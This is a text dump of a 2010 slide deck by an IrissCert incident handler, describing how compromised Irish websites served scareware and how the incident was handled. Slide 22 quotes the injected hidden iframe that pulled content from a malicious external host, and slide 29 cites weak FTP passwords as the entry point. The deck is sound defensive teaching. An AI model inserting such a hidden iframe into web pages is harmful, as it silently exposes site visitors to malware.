As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

1. Scareware Traversing the World via an Irish
Web Exploit
Mark Hillick (@markofu)
IrissCert Incident Handler
Friday 17 September 2010

2. Presentations
99%
Friday 17 September 2010

3. Ireland
Friday 17 September 2010

4. Ireland
CSIRT/CERT?
Friday 17 September 2010

5. Europe
Friday 17 September 2010

6. Introducing IRISS
Volunteer handlers
Local Security
Professionals
Weekly handler shifts
Not-for-profit
organization
Friday 17 September 2010

7. What do we see?
Friday 17 September 2010

8. How do users feel?
2/3 have been victims
< 10% feel very safe
97% expect to be
victims
Law Enforcement &
Businesses lack
resources
Friday 17 September 2010

9. Why we’re here!
Friday 17 September 2010

10. ALERTS
IRISS custom
Friday 17 September 2010

11. Scareware
Friday 17 September 2010

12. $$$$
FBI -> $150 million
Friday 17 September 2010

13. How easy?
Very :-(
Friday 17 September 2010

14. Growth
Friday 17 September 2010

15. Scareware Evolving
Friday 17 September 2010

16. Remember
Zen and the art of incident handling ...
Friday 17 September 2010

17. Reactions
Friday 17 September 2010

18. Reactions
Friday 17 September 2010

19. Reactions
Friday 17 September 2010

20. Identification
Gather information
Analysis
Determine
Friday 17 September 2010

21. Identification - Vector
Legitimate Websites
Friday 17 September 2010

22. Identification - WA
Not visible
iframe injection
• <iframe frameborder = 0 height = 2
width = 2 src ="http://jobstopfil.biz/
tds_a/go.php/go.php?id=4" /></body>
Friday 17 September 2010

23. Identification - iframe
Friday 17 September 2010

24. Identification - WA
DNS requests
HTTP
• Gets
• Posts
Scripts
Friday 17 September 2010

25. Identification - SW
Friday 17 September 2010

26. Identification SW
Friday 17 September 2010

27. Identification - SW
Friday 17 September 2010

28. Identification - SW
Friday 17 September 2010

29. Identification - Analysis
Exploited Sites hosted on one server
Weak FTP passwords (e.g. Ghost61)
Two most popular web site attacks –
• Gumblar - PHP Sites
• Asprox - SQL Injection
Friday 17 September 2010

30. Containment
Verify
Stop the Spread
• Remove
• Notify
• Inform
Blackhole
Source: Profound Whatever - Flickr Creative Commons
Friday 17 September 2010

31. Eradication
Remove
Improve
Vulnerability Analysis
Restore
Friday 17 September 2010

32. Eradication - How?
Friday 17 September 2010

33. Eradication - Hosting
Struggle but...
Friday 17 September 2010

34. Recovery
Source: Dilbert ©2009, United Feature Syndicate, Inc.
Friday 17 September 2010

35. Recovery - Be Sure!
Validate, Restore & Monitor
Friday 17 September 2010

36. Lessons Learned
Friday 17 September 2010

37. Lessons Learned
Things required for an IR plan -
• IR Team
• Contact List
• Regular Reviews
• Escalation Process
Friday 17 September 2010

38. Lessons Learned
Awareness
Back-up & test the restore ;-)
Patch
Test website for vulnerabilities & exploits
Defence-in-depth
Free Local & Online tools for safer
browsing& analysis
Friday 17 September 2010

39. Lessons Learned
“A website must be able to protect itself from a hostile
browser and a browser must be able to protect itself from a
hostile website” Jeremiah Grossman (Feb. 2010)
Friday 17 September 2010

40. Lessons Learned - Prep
Fail to Prepare, well you know the rest :)
Friday 17 September 2010

41. Scareware Evolution
source: http://
www.f-secure.com
Friday 17 September 2010

42. What do you use?
Friday 17 September 2010

43. go raibh mile maith agat
Twitter
@markofu
@irisscert
@hackeire
#irisscon
Google-Fu “scareware site:sans.org”
Unless states, source of images -> Flickr Creative Commons, iStockPhoto or my own!!
Friday 17 September 2010

44. Well......
Friday 17 September 2010